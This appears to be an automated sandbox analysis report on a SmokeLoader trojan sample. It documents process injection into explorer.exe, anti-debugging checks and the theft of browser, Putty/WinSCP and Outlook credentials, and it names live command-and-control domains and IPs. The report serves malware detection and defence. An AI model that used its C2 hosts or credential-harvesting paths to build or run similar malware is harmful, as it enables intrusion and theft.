                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                      Source: CB6F.tmp.7.drBinary or memory string: AMC password management pageVMware20,11696494690
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: CB6F.tmp.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: CB6F.tmp.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /58dkNNZeUbpzKEqNMgIfedN5t07OwVaUYdUvHAi1Vmci+AyDoG5YM9Sp6Avz8GZ
                      Source: CB6F.tmp.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: CB6F.tmp.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3328845519.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2720681255.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3929873885.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3337698366.00000000052C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nN4Ob0EdihPikyg9/f2Ijp9YtJyWtm9Pt4bjD4m2I+TQnlE0jQEmu/HiZX58CXfr
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F7Y4Jb8TGC2Y9elc4Q+PXVFeaNGLOMyeQu+4D4TZJIj9HVFJJRHoqeMUzmixNUIE
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                      Source: CB6F.tmp.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
                      Source: CB6F.tmp.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X0965qmFJYZTMZgkPxQrSMr0mnDTzq3h/B4LcIPnwQnvFDEojVMCisheyqbiKRaU
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: CB6F.tmp.7.drBinary or memory string: global block list test formVMware20,11696494690
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qnJ9IBIqERRPYObzqzCR4E2Pno4vEQK5S3ZmJvdJxxHaOiUt87o3qzu/N3hgfsJy
                      Source: CB6F.tmp.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: CB6F.tmp.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: CB6F.tmp.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: CB6F.tmp.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MV5B3gKLZfBeiIIkOrqzjInc/BDc3VmciZVyyZuAhLdyfok7kfwJgNXGoXAflaSi
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: CB6F.tmp.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: CB6F.tmp.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: CB6F.tmp.7.drBinary or memory string: discord.comVMware20,11696494690f
                      Source: CB6F.tmp.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CtMruuE88zUegpohoAYRJ5dRE/S0A+7zN9dr9JB5J+VR6hgFS0rtauc+i0GQp33G
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Tp1R+vlrD1IQbQGaqeMUcxBijXs2eD8iAol/tEQCxHEjuBNMhnlsJ+8L3PKFV9ij
                      Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRpxBXUnPrQ1RF72qpFNThLnlIDIyFvDGaGgj/xA5nx96U1DmUZuNQemu+yD60k5
                      Source: CB6F.tmp.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: CB6F.tmp.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: CB6F.tmp.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: CB6F.tmp.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: CB6F.tmp.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UFrfpwV8tVMcIS3xoTFuj5TBeDaN1/q2SnijhlCzHbMQcma6JLlAb89jwcbHadsp
                      Source: CB6F.tmp.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: paL2NRvMCI0MgIwk3w9na8CLQs89jm8ml68lWff74o5sWe0hB35mVASi9cjw6Zgw
                      Source: CB6F.tmp.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zky1YUFElgKHOKZFDPrTGaZ3KIn1xbublyxGLQWkIU8BbnmvMCihnACmZs/Ixgls
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +OqVKFUapLs7dkeBTUj/LDdQgceC7O/XE2zjxph4fHgFSuPx5NkzZn5ezpms5G2K
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CaCmYyEidjs0HgLkCOUXz5yRIveOPVo422YPEhU7nqvMCiRtQKO+fno8bUejgrcf
                      Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gx68nznXX4ETXERyNzBanQ0q7UQgKLfP7RE0ac2eJR3AHGFsyJ8lQsVMECkiBNTX
                      Source: C:\Windows\SysWOW64\explorer.exeAPI call chain: ExitProcess graph end nodegraph_13-8872
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcSystem information queried: CodeIntegrityInformationJump to behavior
                      Found API chain indicative of debugger detection
                      Source: C:\Windows\SysWOW64\explorer.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_13-8479
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03221E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,9_2_03221E4C
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030CCBFA IsDebuggerPresent,13_2_030CCBFA
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030CE15A RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,13_2_030CE15A
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,9_2_03223862
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00849247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,7_2_00849247
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E1011 GetProcessHeap,RtlFreeHeap,7_2_007E1011
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C8DF5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_030C8DF5

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exeFile created: hfetwhc.2.drJump to dropped file
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeThread created: C:\Windows\explorer.exe EIP: BE19D0Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcThread created: unknown EIP: 80E19D0Jump to behavior
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\explorer.exeMemory written: PID: 1868 base: A579C0 value: 90Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 2500 base: 7FF62D872D10 value: 90Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 3424 base: A579C0 value: 90Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 2976 base: 7FF62D872D10 value: 90Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 7064 base: A579C0 value: 90Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 6984 base: 7FF62D872D10 value: 90Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 5440 base: A579C0 value: 90Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A579C0Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A579C0Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A579C0Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A579C0Jump to behavior
                      Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1473970077.00000000044D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, hfetwhc, 00000010.00000002.3928450153.0000000000AE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, hfetwhc, 00000010.00000002.3928450153.0000000000AE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                      Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, hfetwhc, 00000010.00000002.3928450153.0000000000AE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000002.00000000.1475801434.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_008355EB cpuid 7_2_008355EB
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E2112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,7_2_007E2112
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,7_2_007E2198

                      Stealing of Sensitive Information

                      barindex
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 4.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hfetwhc, type: DROPPED
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 4.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hfetwhc, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		Boot or Logon Initialization Scripts43
                      Process Injection                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		4
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		22
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                      Software Packing                      		Security Account Manager117
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Timestomp                      		NTDS751
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets231
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion                      		Cached Domain Credentials13
                      Process Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt43
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Hidden Files and Directories                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527171 Sample: 172823964570053a59b24ac6432... Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 42 quantumqube.org 2->42 44 innovixus.org 2->44 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 8 other signatures 2->64 8 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe 2->8         started        11 hfetwhc 2->11         started        13 hfetwhc 2->13         started        signatures3 process4 signatures5 76 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->76 78 Maps a DLL or memory area into another process 8->78 80 Checks if the current machine is a virtual machine (disk enumeration) 8->80 15 explorer.exe 65 10 8->15 injected 82 Multi AV Scanner detection for dropped file 11->82 84 Creates a thread in another existing process (thread injection) 11->84 86 Switches to a custom stack to bypass stack traces 11->86 process6 dnsIp7 46 innovixus.org 198.54.117.242, 443, 49718, 49719 NAMECHEAP-NETUS United States 15->46 48 quantumqube.org 194.87.189.87, 443, 49714, 49715 AS-REGRU Russian Federation 15->48 30 C:\Users\user\AppData\Roaming\hfetwhc, PE32 15->30 dropped 32 C:\Users\user\...\hfetwhc:Zone.Identifier, ASCII 15->32 dropped 50 Benign windows process drops PE files 15->50 52 Injects code into the Windows Explorer (explorer.exe) 15->52 54 Deletes itself after installation 15->54 56 2 other signatures 15->56 20 explorer.exe 20 15->20         started        23 explorer.exe 15->23         started        25 explorer.exe 103 15->25         started        28 4 other processes 15->28 file8 signatures9 process10 file11 66 Found evasive API chain (may stop execution after checking mutex) 20->66 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->68 70 Tries to steal Mail credentials (via file / registry access) 20->70 74 3 other signatures 20->74 72 Tries to harvest and steal browser information (history, passwords, etc) 23->72 34 C:\...\Windows.ApplicationModel.Wallet.dll, PE32 25->34 dropped 36 C:\Users\user\AppData\...\WalletProxy.dll, PE32 25->36 dropped 38 C:\Users\...\WalletBackgroundServiceProxy.dll, PE32 25->38 dropped 40 11 other files (none is malicious) 25->40 dropped signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe47%ReversingLabsWin32.Trojan.SmokeLoader
